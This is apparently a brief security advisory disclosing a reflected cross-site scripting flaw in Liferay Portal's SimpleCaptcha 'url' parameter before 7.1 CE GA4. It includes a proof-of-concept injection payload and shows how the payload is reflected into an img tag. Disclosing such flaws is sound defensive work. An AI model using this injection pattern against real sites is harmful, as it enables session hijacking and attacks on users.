Introduction

In Liferay Portal before 7.1 CE GA4, an XSS vulnerability exists in the SimpleCaptcha API when custom code passes unsanitized input into the “url” parameter of the JSP taglib call <liferay-ui:captcha url=”<%= url %>” /> or <liferay-captcha:captcha url=”<%= url %>” />. A customized Liferay portlet which directly calls the Simple Captcha API without sanitizing the input could be susceptible to this vulnerability.
 

Poc

Appending a payload like the following to the body parameters of a customized form calling the SimpleCaptcha API:
 
&xxxx%22%3e%3cscript%3ealert(1)</script> 
 
It is reflected in the src attribute of the <img> tag responsible of fetching the next captcha:
 
<img alt=”xxx” class=”xxxx” src=”xxxxxx“><script>alert(1)</script>=” />
 

Disclosure timeline

 
 
Share it